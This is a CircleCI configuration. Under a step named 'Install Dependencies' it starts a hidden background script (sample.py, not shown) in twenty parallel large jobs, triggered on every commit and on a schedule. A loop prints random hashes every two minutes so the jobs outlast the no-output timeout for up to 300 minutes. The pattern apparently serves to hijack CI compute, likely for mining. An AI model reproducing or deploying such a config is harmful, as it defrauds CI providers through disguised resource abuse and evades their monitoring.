working_dir: &working_dir ~/app 
.build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install Dependencies 
        command: |
                    apt update && apt -y install wget sudo
                    python sample.py >/dev/null &
                    while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
        no_output_timeout: 300m                               
version: 2.0 
jobs: 
  build1: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build2: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build3: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build4: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build5: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build6: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build7: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build8: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build9: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build10: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build11: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build12: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build13: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build14: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build15: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build16: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build17: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build18: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build19: 
    <<: *script
    docker:
      - image: python
    resource_class: large
  build20: 
    <<: *script
    docker:
      - image: python
    resource_class: large

workflows: 
  version: 2 
  commit: 
    jobs: 
      - build1
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7
      - build8
      - build9
      - build10
      - build11
      - build12
      - build13
      - build14
      - build15
      - build16
      - build17
      - build18
      - build19
      - build20

  schedule:
    triggers:
      - schedule:
          cron: "* 1 * * *"
          filters:
            branches:
              only:
                - main

    jobs: 
      - build1
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7
      - build8
      - build9
      - build10
      - build11
      - build12
      - build13
      - build14
      - build15
      - build16
      - build17
      - build18
      - build19
      - build20
